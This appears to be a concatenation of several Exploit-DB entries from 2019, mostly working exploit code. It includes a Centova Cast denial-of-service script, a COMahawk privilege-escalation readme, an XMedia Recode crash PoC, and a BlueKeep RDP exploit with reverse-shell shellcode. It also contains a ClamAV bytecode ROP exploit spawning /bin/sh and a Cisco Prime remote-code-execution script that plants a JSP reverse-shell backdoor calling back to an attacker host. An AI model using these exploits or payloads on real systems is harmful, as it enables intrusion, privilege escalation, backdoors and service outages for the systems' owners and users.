TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Rockwell Software\FactoryTalk Activation\lmgrd.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : FactoryTalk Activation Service DEPENDENCIES : winmgmt : wmiapsrv : +NetworkProvider SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: Centova Cast 3.2.12 - Denial of Service (PoC) # Date: 2019-11-18 # Exploit Author: DroidU # Vendor Homepage: https://centova.com # Affected Version: <=v3.2.12 # Tested on: Debian 9, CentOS 7 # =============================================== # The Centova Cast becomes out of control and causes 100% CPU load on all cores. #!/bin/bash if [ "$3" = "" ] then echo "Usage: $0 centovacast_url reseller/admin password" exit fi url=$1 reseller=$2 pass=$3 dwn() { echo -n . curl -s -k --connect-timeout 5 -m 5 "$url/api.php?xm=system.database&f=json&a\[username\]=&a\[password\]=$reseller|$pass&a\[action\]=export&a\[filename\]=/dev/zero" & } for i in {0..32} do dwn /dev/zero sleep .1 done echo " Done!"

## EDB Note Download: - https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47684-1.exe - https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47684-2.zip # COMahawk **Privilege Escalation: Weaponizing CVE-2019-1405 and CVE-2019-1322** ## Video Demo https://vimeo.com/373051209 ## Usage ### Compile or Download from Release (https://github.com/apt69/COMahawk/releases) 1. Run COMahawk.exe 2. ??? 3. Hopefully profit or 1. COMahawk.exe "custom command to run" (ie. COMahawk.exe "net user /add test123 lol123 &") 2. ??? 3. Hopefully profit ## Concerns **MSDN mentioned that only 1803 to 1903 is vulnerable to CVE-2019-1322. If it doesn't work, maybe it was patched.** However, it is confirmed that my 1903 does indeed have this bug so maybe it was introduced somewhere inbetween. YMMV. Also, since you are executing from a service - you most likely cannot spawn any Window hence all command will be "GUI-less". Maybe different session? Idk, it is too late and I am tired haha. ## Credits: https://twitter.com/leoloobeek for helping me even when he doesn't even have a laptop https://twitter.com/TomahawkApt69 for being the mental support and motivation and most of all: https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/ for discovering and publishing the write up. 100% of the credit goes here.

#Exploit Title: XMedia Recode 3.4.8.6 - '.m3u' Denial Of Service #Exploit Author : ZwX #Exploit Date: 2019-11-18 #Vendor Homepage : https://www.xmedia-recode.de/ #Link Software : https://www.xmedia-recode.de/download.php #Tested on OS: Windows 7 #Social: twitter.com/ZwX2a #contact: [email protected] ''' Proof of Concept (PoC): ======================= 1.Download and install XMedia Recode 2.Run the python operating script that will create a file (poc.m3u) 3.Run the software "File -> Open File -> Add the file (.m3u) " 4.XMedia Recode Crashed ''' #!/usr/bin/python http = "http://" buffer = "\x41" * 500 poc = http + buffer file = open("poc.m3u,"w") file.write(poc) file.close() print "POC Created by ZwX"

# EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47683.zip import rdp import socket import binascii import time def pool_spray(s, crypter, payload): times = 10000 count = 0 while count < times: count += 1 #print('time through %d' % count) try: s.sendall(rdp.write_virtual_channel(crypter, 7, 1005, payload)) except ConnectionResetError: print('ConnectionResetError pool_spray Aborting') quit() def main(): # change to your target host = '192.168.0.46' port = 3389 times = 4000 count = 0 target = (host, port) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(target) crypter = rdp.connect(s) # this address was choosen for the pool spray. it could be be # modified for potentially higher success rates. # in my testing against the win7 VM it is around 80% success # 0x874ff028 shellcode_address = b'\x28\xf0\x4f\x87' # replace buf with your shellcode buf = b"" buf += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b" buf += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7" buf += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf" buf += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c" buf += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01" buf += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31" buf += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d" buf += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66" buf += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0" buf += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f" buf += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68" buf += b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8" buf += b"\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" buf += b"\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f" buf += b"\xdf\xe0\xff\xd5\x97\x6a\x05\x68\xc0\xa8\x00\x22\x68" buf += b"\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5" buf += b"\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec" buf += b"\x68\xf0\xb5\xa2\x56\xff\xd5\x68\x63\x6d\x64\x00\x89" buf += b"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66" buf += b"\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44" buf += b"\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68" buf += b"\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30" buf += b"\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68" buf += b"\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0" buf += b"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5" # bluekeep_kshellcode_x86.asm # ring 0 to ring 3 shellcode shellcode = b"" shellcode += b"\x60\xe8\x00\x00\x00\x00\x5b\xe8\x26\x00\x00\x00" shellcode += b"\xb9\x76\x01\x00\x00\x0f\x32\x8d\x7b\x3c\x39\xf8" shellcode += b"\x74\x11\x39\x45\x00\x74\x06\x89\x45\x00\x89\x55" shellcode += b"\x08\x89\xf8\x31\xd2\x0f\x30\x61\xf4\xeb\xfd\xc2" shellcode += b"\x24\x00\x8d\xab\x00\x10\x00\x00\xc1\xed\x0c\xc1" shellcode += b"\xe5\x0c\x83\xed\x50\xc3\xb9\x23\x00\x00\x00\x6a" shellcode += b"\x30\x0f\xa1\x8e\xd9\x8e\xc1\x64\x8b\x0d\x40\x00" shellcode += b"\x00\x00\x8b\x61\x04\x51\x9c\x60\xe8\x00\x00\x00" shellcode += b"\x00\x5b\xe8\xcb\xff\xff\xff\x8b\x45\x00\x83\xc0" shellcode += b"\x17\x89\x44\x24\x24\x31\xc0\x99\x42\xf0\x0f\xb0" shellcode += b"\x55\x08\x75\x12\xb9\x76\x01\x00\x00\x99\x8b\x45" shellcode += b"\x00\x0f\x30\xfb\xe8\x04\x00\x00\x00\xfa\x61\x9d" shellcode += b"\xc3\x8b\x45\x00\xc1\xe8\x0c\xc1\xe0\x0c\x2d\x00" shellcode += b"\x10\x00\x00\x66\x81\x38\x4d\x5a\x75\xf4\x89\x45" shellcode += b"\x04\xb8\x78\x7c\xf4\xdb\xe8\xd3\x00\x00\x00\x97" shellcode += b"\xb8\x3f\x5f\x64\x77\x57\xe8\xc7\x00\x00\x00\x29" shellcode += b"\xf8\x89\xc1\x3d\x70\x01\x00\x00\x75\x03\x83\xc0" shellcode += b"\x08\x8d\x58\x1c\x8d\x34\x1f\x64\xa1\x24\x01\x00" shellcode += b"\x00\x8b\x36\x89\xf2\x29\xc2\x81\xfa\x00\x04\x00" shellcode += b"\x00\x77\xf2\x52\xb8\xe1\x14\x01\x17\xe8\x9b\x00" shellcode += b"\x00\x00\x8b\x40\x0a\x8d\x50\x04\x8d\x34\x0f\xe8" shellcode += b"\xcb\x00\x00\x00\x3d\x5a\x6a\xfa\xc1\x74\x0e\x3d" shellcode += b"\xd8\x83\xe0\x3e\x74\x07\x8b\x3c\x17\x29\xd7\xeb" shellcode += b"\xe3\x89\x7d\x0c\x8d\x1c\x1f\x8d\x75\x10\x5f\x8b" shellcode += b"\x5b\x04\xb8\x3e\x4c\xf8\xce\xe8\x61\x00\x00\x00" shellcode += b"\x8b\x40\x0a\x3c\xa0\x77\x02\x2c\x08\x29\xf8\x83" shellcode += b"\x7c\x03\xfc\x00\x74\xe1\x31\xc0\x55\x6a\x01\x55" shellcode += b"\x50\xe8\x00\x00\x00\x00\x81\x04\x24\x92\x00\x00" shellcode += b"\x00\x50\x53\x29\x3c\x24\x56\xb8\xc4\x5c\x19\x6d" shellcode += b"\xe8\x25\x00\x00\x00\x31\xc0\x50\x50\x50\x56\xb8" shellcode += b"\x34\x46\xcc\xaf\xe8\x15\x00\x00\x00\x85\xc0\x74" shellcode += b"\xaa\x8b\x45\x1c\x80\x78\x0e\x01\x74\x07\x89\x00" shellcode += b"\x89\x40\x04\xeb\x9a\xc3\xe8\x02\x00\x00\x00\xff" shellcode += b"\xe0\x60\x8b\x6d\x04\x97\x8b\x45\x3c\x8b\x54\x05" shellcode += b"\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\x49" shellcode += b"\x8b\x34\x8b\x01\xee\xe8\x1d\x00\x00\x00\x39\xf8" shellcode += b"\x75\xf1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b" shellcode += b"\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24" shellcode += b"\x1c\x61\xc3\x52\x31\xc0\x99\xac\xc1\xca\x0d\x01" shellcode += b"\xc2\x85\xc0\x75\xf6\x92\x5a\xc3\x58\x89\x44\x24" shellcode += b"\x10\x58\x59\x58\x5a\x60\x52\x51\x8b\x28\x31\xc0" shellcode += b"\x64\xa2\x24\x00\x00\x00\x99\xb0\x40\x50\xc1\xe0" shellcode += b"\x06\x50\x54\x52\x89\x11\x51\x4a\x52\xb8\xea\x99" shellcode += b"\x6e\x57\xe8\x7b\xff\xff\xff\x85\xc0\x75\x4f\x58" shellcode += b"\x8b\x38\xe8\x00\x00\x00\x00\x5e\x83\xc6\x55\xb9" shellcode += b"\x00\x04\x00\x00\xf3\xa4\x8b\x45\x0c\x50\xb8\x48" shellcode += b"\xb8\x18\xb8\xe8\x56\xff\xff\xff\x8b\x40\x0c\x8b" shellcode += b"\x40\x14\x8b\x00\x66\x83\x78\x24\x18\x75\xf7\x8b" shellcode += b"\x50\x28\x81\x7a\x0c\x33\x00\x32\x00\x75\xeb\x8b" shellcode += b"\x58\x10\x89\x5d\x04\xb8\x5e\x51\x5e\x83\xe8\x32" shellcode += b"\xff\xff\xff\x59\x89\x01\x31\xc0\x88\x45\x08\x40" shellcode += b"\x64\xa2\x24\x00\x00\x00\x61\xc3\x5a\x58\x58\x59" shellcode += b"\x51\x51\x51\xe8\x00\x00\x00\x00\x83\x04\x24\x09" shellcode += b"\x51\x51\x52\xff\xe0\x31\xc0" shellcode += buf print('shellcode len: %d' % len(shellcode)) payload_size = 1600 payload = b'\x2c\xf0\x4f\x87' + shellcode payload = payload + b'\x5a' * (payload_size - len(payload)) print('[+] spraying pool') pool_spray(s, crypter, payload) fake_obj_size = 168 call_offset = 108 fake_obj = b'\x00'*call_offset + shellcode_address fake_obj = fake_obj + b'\x00' * (fake_obj_size - len(fake_obj)) time.sleep(.5) print('[+] sending free') s.sendall(rdp.free_32(crypter)) time.sleep(.15) print('[+] allocating fake objects') while count < times: count += 1 #print('time through %d' % count) try: s.sendall(rdp.write_virtual_channel(crypter, 7, 1005, fake_obj)) except ConnectionResetError: s.close() s.close() if __name__== "__main__": main()

EDB Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47685.zip

#!/usr/bin/python ''' Finished : 22/07/2019 Pu8lished : 31/10/2019 Versi0n : Current (<= 0.102.0) Result : Just for fun. "Because of my inability to change the world." In 2002, ClamAV got introducted as a solution for malwares on UNIX-based systems, built on a signature-based detection approach, and still undergoes active-development. by that time, LibClamAV only held 2 binaries, and expanded to 5 at present. ClamBC were exceptionally more complex and served as a testing tool for bytecodes, majorly validating and interpreting the code therein, and the information provided didn't indicate nor explain the presence of its internal mechanisms. The availability of the source-code and the lack of documentation led to the establishment of this paper, it was certainly not an attempt to escalate privileges, but rather a sought -after experience, and source of entertainment that grants the thrill of a challenge. Due to the considerable amount of time spent in the analysis, the dissection of the engine was imminent, whilst significantly broadening our perception on its internal structures. The trial and error process produced valuable information, crashes illuminated latent bugs, effectively increasing the attack surface, and magnifying the possibility for exploitation. > ./exploit.py > clambc --debug exploit [SNIP] $ ''' names = ['test1', 'read', 'write', 'seek', 'setvirusname', 'debug_print_str', 'debug_print_uint', 'disasm_x86', 'trace_directory', 'trace_scope', 'trace_source', 'trace_op', 'trace_value', 'trace_ptr', 'pe_rawaddr', 'file_find', 'file_byteat', 'malloc', 'test2', 'get_pe_section', 'fill_buffer', 'extract_new', 'read_number', 'hashset_new', 'hashset_add', 'hashset_remove', 'hashset_contains', 'hashset_done', 'hashset_empty', 'buffer_pipe_new', 'buffer_pipe_new_fromfile', 'buffer_pipe_read_avail', 'buffer_pipe_read_get', 'buffer_pipe_read_stopped', 'buffer_pipe_write_avail', 'buffer_pipe_write_get', 'buffer_pipe_write_stopped', 'buffer_pipe_done', 'inflate_init', 'inflate_process', 'inflate_done', 'bytecode_rt_error', 'jsnorm_init', 'jsnorm_process', 'jsnorm_done', 'ilog2', 'ipow', 'iexp', 'isin', 'icos', 'memstr', 'hex2ui', 'atoi', 'debug_print_str_start', 'debug_print_str_nonl', 'entropy_buffer', 'map_new', 'map_addkey', 'map_setvalue', 'map_remove', 'map_find', 'map_getvaluesize', 'map_getvalue', 'map_done', 'file_find_limit', 'engine_functionality_level', 'engine_dconf_level', 'engine_scan_options', 'engine_db_options', 'extract_set_container', 'input_switch', 'get_environment', 'disable_bytecode_if', 'disable_jit_if', 'version_compare', 'check_platform', 'pdf_get_obj_num', 'pdf_get_flags', 'pdf_set_flags', 'pdf_lookupobj', 'pdf_getobjsize', 'pdf_getobj', 'pdf_getobjid', 'pdf_getobjflags', 'pdf_setobjflags', 'pdf_get_offset', 'pdf_get_phase', 'pdf_get_dumpedobjid', 'matchicon', 'running_on_jit', 'get_file_reliability', 'json_is_active', 'json_get_object', 'json_get_type', 'json_get_array_length', 'json_get_array_idx', 'json_get_string_length', 'json_get_string', 'json_get_boolean', 'json_get_int'] o = names.index('buffer_pipe_new') + 1 k = names.index('buffer_pipe_write_get') + 1 l = names.index('debug_print_str') + 1 m = names.index('malloc') + 1 c = 0 for name in names: names[c] = name.encode('hex') c += 1 def cc(n): v = chr(n + 0x60) return v def cs(s): t = '' for i in xrange(0, len(s), 2): u = int(s[i], 16) l = int(s[i + 1], 16) for i in [u, l]: if((i >= 0 and i <= 0xf)): continue print 'Invalid string.' exit(0) t += cc(l) + cc(u) return t def wn(n, fixed=0, size=0): if n is 0: return cc(0) t = '' c = hex(n)[2:] l = len(c) if (l % 2) is 1: c = "0" + c r = c[::-1] if(l <= 0x10): if not fixed: t = cc(l) i = 0 while i < l: t += cc(int(r[i], 16)) i += 1 else: print 'Invalid number.' exit(0) if size != 0: t = t.ljust(size, '`') return t def ws(s): t = '|' e = s[-2:] if(e != '00'): print '[+] Adding null-byte at the end of the string..' s += '00' l = (len(s) / 2) if (len(s) % 2) is 1: print 'Invalid string length.' exit(0) t += wn(l) t += cs(s) return t def wt(t): if t < (num_types + 0x45): v = wn(t) return v else: print 'Invalid type.' exit(0) def initialize_header(minfunc=0, maxfunc=0, num_func=0, linelength=4096): global flimit, num_types if maxfunc is 0: maxfunc = flimit if(minfunc > flimit or maxfunc < flimit): print 'Invalid minfunc and/or maxfunc.' exit(0) header = "ClamBC" header += wn(0x07) # formatlevel(6, 7) header += wn(0x88888888) # timestamp header += ws("416c69656e") # sigmaker header += wn(0x00) # targetExclude header += wn(0x00) # kind header += wn(minfunc) # minfunc header += wn(maxfunc) # maxfunc header += wn(0x00) # maxresource header += ws("00") # compiler header += wn(num_types + 5) # num_types header += wn(num_func) # num_func header += wn(0x53e5493e9f3d1c30) # magic1 header += wn(0x2a, 1) # magic2 header += ':' header += str(linelength) header += chr(0x0a)*2 return header def prepare_types(contained, type=1, nume=1): global num_types types = "T" types += wn(0x45, 1) # start_tid(69) for i in range(0, num_types): types += wn(type[i], 1) # kind if type[i] in [1, 2, 3]: # Function, PackedStruct, Struct types += wn(nume[i]) # numElements for j in range(0, nume[i]): types += wt(contained[i][j]) # containedTypes[j] else: # Array, Pointer if type[i] != 5: types += wn(nume[i]) # numElements types += wt(contained[i][0]) # containedTypes[0] types += chr(0x0a) return types def prepare_apis(calls=1): global maxapi, names, ids, tids if(calls > max_api): print 'Invalid number of calls.' exit(0) apis = 'E' apis += wn(max_api) # maxapi apis += wn(calls) # calls(<= maxapi) for i in range(0, calls): apis += wn(ids[i]) # id apis += wn(tids[i]) # tid apis += ws(names[ids[i] - 1]) # name apis += chr(0x0a) return apis def prepare_globals(numglobals=1): global max_globals, type, gval globals = 'G' globals += wn(max_globals) # maxglobals globals += wn(numglobals) # numglobals for i in range(0, numglobals): globals += wt(type[i]) # type for j in gval[i]: # subcomponents n = wn(j) globals += chr(ord(n[0]) - 0x20) globals += n[1:] globals += cc(0) globals += chr(0x0a) return globals def prepare_function_header(numi, numbb, numa=1, numl=0): global allo if numa > 0xf: print 'Invalid number of arguments.' exit(0) fheader = 'A' fheader += wn(numa, 1) # numArgs fheader += wt(0x20) # returnType fheader += 'L' fheader += wn(numl) # numLocals for i in range(0, numa + numl): fheader += wn(type[i]) # types fheader += wn(allo[i], 1) # | 0x8000 fheader += 'F' fheader += wn(numi) # numInsts fheader += wn(numbb) # numBB fheader += chr(0x0a) return fheader flimit = 93 max_api = 100 max_globals = 32773 num_types = 6 # Header parsing w = initialize_header(num_func=0x1) # Types parsing cont = [[0x8], [0x45], [0x20, 0x20], [0x41, 0x20, 0x20], [0x20, 0x41, 0x20], [0x41, 0x20]] type = [0x4, 0x5, 0x1, 0x1, 0x1, 0x1] num = [0x8, 0x1, 0x2, 0x3, 0x3, 0x2] w += prepare_types(cont, type, num) # API parsing ids = [o, k, l, m] tids = [71, 72, 73, 74] w += prepare_apis(0x4) ''' # crash @ id=0 ''' # Globals parsing type = [0x45] gval = [[0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41]] w += prepare_globals(0x1) # Function header parsing type = [0x45, 0x41, 0x40, 0x40, 0x40, 0x40, 0x20] allo = [ 1, 0, 0, 0, 0, 0, 0] w += prepare_function_header(35, 0x1, 0x0, 0x7) # BB parsing p = 'B' # GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x0) p += wn(0x0) p += wn(0x1) p += wn(0x24, 1) p += wn(0x46) p += wn(0x0) p += '@d' # STORE (0x0068732f6e69622f(L=8) -> ([Var #1])) p += wn(0x40) p += wn(0x0) p += wn(0x26, 1) p += 'Nobbfifnfobcghfh' p += wn(0x1) # GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x360) p += wn(0x0) p += wn(0x1) p += wn(0x24, 1) p += wn(0x46) p += wn(0x0) p += 'C`fcd' # LOAD Var #2 = ([Var #1]) p += wn(0x40) p += wn(0x2) p += wn(0x27, 1) p += wn(0x1) # SUB Var #2 -= 0xd260 p += wn(0x40) p += wn(0x2) p += wn(0x2, 1, 2) p += wn(0x2) p += 'D`fbmd' # GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x10) p += wn(0x0) p += wn(0x1) p += wn(0x24, 1) p += wn(0x46) p += wn(0x0) p += 'B`ad' # LOAD Var #3 = ([Var #1]) p += wn(0x40) p += wn(0x3) p += wn(0x27, 1) p += wn(0x1) # SUB Var #3 -= 0x10 p += wn(0x40) p += wn(0x3) p += wn(0x2, 1, 2) p += wn(0x3) p += 'B`ad' # GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x30) p += wn(0x0) p += wn(0x1) p += wn(0x24, 1) p += wn(0x46) p += wn(0x0) p += 'B`cd' # LOAD Var #4 = ([Var #1]) p += wn(0x40) p += wn(0x4) p += wn(0x27, 1) p += wn(0x1) # SUB Var #4 -= 0x190 p += wn(0x40) p += wn(0x4) p += wn(0x2, 1, 2) p += wn(0x4) p += 'C`iad' # GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x38) p += wn(0x0) p += wn(0x1) p += wn(0x24, 1) p += wn(0x46) p += wn(0x0) p += 'Bhcd' # STORE (Var #3 -> Var #1) p += wn(0x40) p += wn(0x0) p += wn(0x26, 1) p += wn(0x3) p += wn(0x1) # GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x48) p += wn(0x0) p += wn(0x1) p += wn(0x24, 1) p += wn(0x46) p += wn(0x0) p += 'Bhdd' # ADD Var #3 += 0x3 p += wn(0x40) p += wn(0x3) p += wn(0x2, 1, 2) p += wn(0x3) p += 'Acd' # STORE (Var #3 -> Var #1) p += wn(0x40) p += wn(0x0) p += wn(0x26, 1) p += wn(0x3) p += wn(0x1) # GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x28) p += wn(0x0) p += wn(0x1) p += wn(0x24, 1) p += wn(0x46) p += wn(0x0) p += 'Bhbd' # ADD Var #5 += Var #2 + 0xcbda p += wn(0x40) p += wn(0x5) p += wn(0x1, 1, 2) p += wn(0x2) p += 'Djmkld' # STORE (Var #5 -> Var #1) p += wn(0x40) p += wn(0x0) p += wn(0x26, 1) p += wn(0x5) p += wn(0x1) # GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x20) p += wn(0x0) p += wn(0x1) p += wn(0x24, 1) p += wn(0x46) p += wn(0x0) p += 'B`bd' # STORE (Var #4 -> Var #1) p += wn(0x40) p += wn(0x0) p += wn(0x26, 1) p += wn(0x4) p += wn(0x1) # GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x18) p += wn(0x0) p += wn(0x1) p += wn(0x24, 1) p += wn(0x46) p += wn(0x0) p += 'Bhad' # ADD Var #5 += Var #2 + 0x99dc p += wn(0x40) p += wn(0x5) p += wn(0x1, 1, 2) p += wn(0x2) p += 'Dlmiid' # STORE (Var #5 -> Var #1) p += wn(0x40) p += wn(0x0) p += wn(0x26, 1) p += wn(0x5) p += wn(0x1) # GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x10) p += wn(0x0) p += wn(0x1) p += wn(0x24, 1) p += wn(0x46) p += wn(0x0) p += 'B`ad' # STORE (0x3b -> Var #1) p += wn(0x40) p += wn(0x0) p += wn(0x26, 1) p += 'Bkcd' p += wn(0x1) # GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x30) p += wn(0x0) p += wn(0x1) p += wn(0x24, 1) p += wn(0x46) p += wn(0x0) p += 'B`cd' # STORE (0x0 -> Var #1) p += wn(0x40) p += wn(0x0) p += wn(0x26, 1) p += '@d' p += wn(0x1) # GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x40) p += wn(0x0) p += wn(0x1) p += wn(0x24, 1) p += wn(0x46) p += wn(0x0) p += 'B`dd' # STORE (0x0 -> Var #1) p += wn(0x40) p += wn(0x0) p += wn(0x26, 1) p += '@d' p += wn(0x1) # GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x8) p += wn(0x0) p += wn(0x1) p += wn(0x24, 1) p += wn(0x46) p += wn(0x0) p += 'Ahd' # ADD Var #2 += 0x6d68 p += wn(0x40) p += wn(0x2) p += wn(0x1, 1, 2) p += wn(0x2) p += 'Dhfmfd' # STORE (Var #2 -> Var #1) p += wn(0x40) p += wn(0x0) p += wn(0x26, 1) p += wn(0x2) p += wn(0x1) ''' 0x99dc : pop rdi ; ret 0xcbda : pop rsi ; ret 0x6d68 : pop rax ; ret Var #2 = text_base Var #3 = syscall (+3: pop rdx; ret) Var #4 = "/bin/sh\x00" pop rax; ret; o 0x8 59 o 0x10 pop rdi; ret; o 0x18 sh; address o 0x20 pop rsi; ret; o 0x28 0x0 o 0x30 pop rdx; ret; o 0x38 0x0 o 0x40 syscall o 0x48 ''' # COPY Var #6 = (0x5a90050f(o`e``ije)) p += wn(0x20) p += wn(0x0) p += wn(0x22, 1) p += 'Ho`e``ijeh' p += wn(0x6) p += 'T' p += wn(0x13, 1) p += wn(0x20) p += wn(0x6) p += 'E' w += p f = open("exploit", "w") f.write(w) f.close() print '[+] Generated payload' ''' Mortals represent immorality, clueless, they crush each other in an everlasting pursuit to climb the ladder of social-status, greed is engraved in their nature, they're materialistic, and the essence of their lives is money and wealth. However, such definition is inaccurate as it doesn't apply to the minority. I have discovered a truly marvelous proof of their existence, which this margin is too narrow to contain. - Alien599, not Fermat. Greetings to Alien133, Alien610, Alien6068, Alien814, Alien641. X '''

#!/usr/bin/python """ Cisco Prime Infrastructure Health Monitor HA TarArchive Directory Traversal Remote Code Execution Vulnerability Steven Seeley (mr_me) of Source Incite - 2019 SRC: SRC-2019-0034 CVE: CVE-2019-1821 Example: ======== saturn:~ mr_me$ ./poc.py (+) usage: ./poc.py <target> <connectback:port> (+) eg: ./poc.py 192.168.100.123 192.168.100.2:4444 saturn:~ mr_me$ ./poc.py 192.168.100.123 192.168.100.2:4444 (+) planted backdoor! (+) starting handler on port 4444 (+) connection from 192.168.100.123 (+) pop thy shell! python -c 'import pty; pty.spawn("/bin/bash")' [prime@piconsole CSCOlumos]$ /opt/CSCOlumos/bin/runrshell '" && /bin/sh #' /opt/CSCOlumos/bin/runrshell '" && /bin/sh #' sh-4.1# /usr/bin/id /usr/bin/id uid=0(root) gid=0(root) groups=0(root),110(gadmin),201(xmpdba) context=system_u:system_r:unconfined_java_t:s0 sh-4.1# exit exit exit [prime@piconsole CSCOlumos]$ exit exit exit """ import sys import socket import requests import tarfile import telnetlib from threading import Thread from cStringIO import StringIO from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) def _build_tar(ls, lp): """ build the tar archive without touching disk """ f = StringIO() b = _get_jsp(ls, lp) t = tarfile.TarInfo("../../opt/CSCOlumos/tomcat/webapps/ROOT/si.jsp") t.size = len(b) with tarfile.open(fileobj=f, mode="w") as tar: tar.addfile(t, StringIO(b)) return f.getvalue() def _get_jsp(ls, lp): jsp = """<%@page import="java.lang.*"%> <%@page import="java.util.*"%> <%@page import="java.io.*"%> <%@page import="java.net.*"%> <% class StreamConnector extends Thread { InputStream sv; OutputStream tp; StreamConnector( InputStream sv, OutputStream tp ) { this.sv = sv; this.tp = tp; } public void run() { BufferedReader za = null; BufferedWriter hjr = null; try { za = new BufferedReader( new InputStreamReader( this.sv ) ); hjr = new BufferedWriter( new OutputStreamWriter( this.tp ) ); char buffer[] = new char[8192]; int length; while( ( length = za.read( buffer, 0, buffer.length ) ) > 0 ) { hjr.write( buffer, 0, length ); hjr.flush(); } } catch( Exception e ){} try { if( za != null ) za.close(); if( hjr != null ) hjr.close(); } catch( Exception e ){} } } try { String ShellPath = new String("/bin/sh"); Socket socket = new Socket("__IP__", __PORT__); Process process = Runtime.getRuntime().exec( ShellPath ); ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start(); ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start(); } catch( Exception e ) {} %>""" return jsp.replace("__IP__", ls).replace("__PORT__", str(lp)) def handler(lp): """ This is the client handler, to catch the connectback """ print "(+) starting handler on port %d" % lp t = telnetlib.Telnet() s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(("0.0.0.0", lp)) s.listen(1) conn, addr = s.accept() print "(+) connection from %s" % addr[0] t.sock = conn print "(+) pop thy shell!" t.interact() def exec_code(t, lp): """ This function threads the client handler and sends off the attacking payload """ handlerthr = Thread(target=handler, args=(lp,)) handlerthr.start() r = requests.get("https://%s/si.jsp" % t, verify=False) def we_can_upload(t, ls, lp): """ This is where we take advantage of the vulnerability """ td = _build_tar(ls, lp) bd = {'files': ('si.tar', td)} h = { 'Destination-Dir': 'tftpRoot', 'Compressed-Archive': "false", 'Primary-IP' : '127.0.0.1', 'Filecount' : "1", 'Filename': "si.tar", 'Filesize' : str(len(td)), } r = requests.post("https://%s:8082/servlet/UploadServlet" % t, headers=h, files=bd, verify=False) if r.status_code == 200: return True return False def main(): if len(sys.argv) != 3: print "(+) usage: %s <target> <connectback:port>" % sys.argv[0] print "(+) eg: %s 192.168.100.123 192.168.100.2:4444" % sys.argv[0] sys.exit(-1) t = sys.argv[1] cb = sys.argv[2] if not ":" in cb: print "(+) using default connectback port 4444" ls = cb lp = 4444 else: if not cb.split(":")[1].isdigit(): print "(-) %s is not a port number!" % cb.split(":")[1] sys.exit(-1) ls = cb.split(":")[0] lp = int(cb.split(":")[1]) if we_can_upload(t, ls, lp): print "(+) planted backdoor!" exec_code(t, lp) if __name__ == '__main__': main()